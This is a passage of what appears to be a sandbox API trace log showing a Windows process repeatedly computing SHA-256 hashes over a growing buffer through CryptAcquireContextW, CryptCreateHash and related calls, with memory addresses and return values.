	[0225.002] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.002] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.002] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0225.002] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27792c0
	[0225.002] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27792c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27792c0, pdwDataLen=0x128ba4) returned 1
	[0225.002] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.002] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.003] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.003] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.003] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0225.003] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27792e8
	[0225.003] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27792e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27792e8, pdwDataLen=0x128ba4) returned 1
	[0225.003] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.003] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.003] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.003] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.003] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0225.003] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779310
	[0225.003] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779310, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779310, pdwDataLen=0x128ba4) returned 1
	[0225.003] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.003] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.004] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.004] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.004] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0225.004] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779338
	[0225.004] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779338, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779338, pdwDataLen=0x128ba4) returned 1
	[0225.004] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.004] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.004] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.004] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.004] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0225.004] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779360
	[0225.004] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779360, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779360, pdwDataLen=0x128ba4) returned 1
	[0225.004] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.004] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.005] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.005] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.005] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0225.005] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779388
	[0225.005] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779388, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779388, pdwDataLen=0x128ba4) returned 1
	[0225.005] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.005] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.005] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.005] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.005] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0225.005] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27793b0
	[0225.005] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27793b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27793b0, pdwDataLen=0x128ba4) returned 1
	[0225.005] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.005] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.006] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.006] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.006] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0225.006] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27793d8
	[0225.006] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27793d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27793d8, pdwDataLen=0x128ba4) returned 1
	[0225.006] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.006] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.006] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.006] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.006] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0225.006] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779400
	[0225.006] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779400, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779400, pdwDataLen=0x128ba4) returned 1
	[0225.006] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.006] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.006] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.007] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.007] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0225.007] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779428
	[0225.007] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779428, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779428, pdwDataLen=0x128ba4) returned 1
	[0225.007] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.007] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.007] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.007] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.007] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0225.007] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779450
	[0225.008] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779450, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779450, pdwDataLen=0x128ba4) returned 1
	[0225.008] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.008] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.008] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.008] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.008] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0225.008] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779478
	[0225.008] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779478, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779478, pdwDataLen=0x128ba4) returned 1
	[0225.008] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.008] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.008] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.009] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.009] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0225.009] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27794a0
	[0225.009] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27794a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27794a0, pdwDataLen=0x128ba4) returned 1
	[0225.009] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.009] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.009] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.009] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.009] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0225.009] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27794c8
	[0225.009] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27794c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27794c8, pdwDataLen=0x128ba4) returned 1
	[0225.009] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.009] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.009] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.010] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.010] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0225.010] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27794f0
	[0225.010] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27794f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27794f0, pdwDataLen=0x128ba4) returned 1
	[0225.010] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.010] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.010] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.010] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.010] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0225.010] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779518
	[0225.010] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779518, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779518, pdwDataLen=0x128ba4) returned 1
	[0225.010] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.010] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.010] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.011] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.011] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0225.011] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779540
	[0225.011] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779540, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779540, pdwDataLen=0x128ba4) returned 1
	[0225.011] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.011] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.011] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.011] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.011] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0225.011] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779568
	[0225.011] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779568, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779568, pdwDataLen=0x128ba4) returned 1
	[0225.011] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.011] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.011] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.012] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.012] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0225.012] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779590
	[0225.012] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779590, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779590, pdwDataLen=0x128ba4) returned 1
	[0225.012] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.012] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.012] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.012] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.012] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0225.012] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27795b8
	[0225.012] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27795b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27795b8, pdwDataLen=0x128ba4) returned 1
	[0225.012] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.012] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.012] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.013] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.013] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0225.013] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27795e0
	[0225.013] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27795e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27795e0, pdwDataLen=0x128ba4) returned 1
	[0225.013] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.013] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.013] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.013] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.013] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0225.013] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779608
	[0225.013] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779608, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779608, pdwDataLen=0x128ba4) returned 1
	[0225.013] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.013] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.013] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.014] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.014] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0225.014] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779630
	[0225.014] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779630, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779630, pdwDataLen=0x128ba4) returned 1
	[0225.014] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.014] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.014] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.014] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.014] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0225.014] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779658
	[0225.014] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779658, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779658, pdwDataLen=0x128ba4) returned 1
	[0225.014] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.014] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.014] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.015] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.015] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0225.015] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779680
	[0225.015] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779680, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779680, pdwDataLen=0x128ba4) returned 1
	[0225.015] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.015] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.015] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.015] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
